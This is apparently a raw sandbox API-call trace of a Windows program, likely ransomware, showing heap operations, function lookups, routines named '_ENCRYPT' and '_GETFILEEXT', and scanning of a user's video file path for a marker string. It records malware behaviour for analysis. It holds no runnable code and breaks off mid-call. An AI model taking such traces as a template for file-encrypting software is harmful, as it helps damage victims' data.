FreeLibrary (hLibModule=0x75990000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0199.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0199.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.108] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0199.108] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0199.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.109] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.109] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0199.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0199.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.110] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0199.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.110] CloseHandle (hObject=0x160) returned 1 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0199.111] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.111] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0199.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.112] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.112] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0199.112] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.112] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0199.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.112] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9978e910, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7fde61e0, ftLastAccessTime.dwHighDateTime=0x1d5df17, ftLastWriteTime.dwLowDateTime=0x7fde61e0, ftLastWriteTime.dwHighDateTime=0x1d5df17, nFileSizeHigh=0x0, nFileSizeLow=0x17682, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AGaY9D6lmIb.mkv", cAlternateFileName="AGAY9D~1.MKV")) returned 0x90add8 [0199.112] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.113] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9978e910, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0x7fde61e0, ftLastAccessTime.dwHighDateTime=0x1d5df17, ftLastWriteTime.dwLowDateTime=0x7fde61e0, ftLastWriteTime.dwHighDateTime=0x1d5df17, nFileSizeHigh=0x0, nFileSizeLow=0x17682, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AGaY9D6lmIb.mkv", cAlternateFileName="AGAY9D~1.MKV")) returned 0x90add8 [0199.113] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.114] CompareStringW 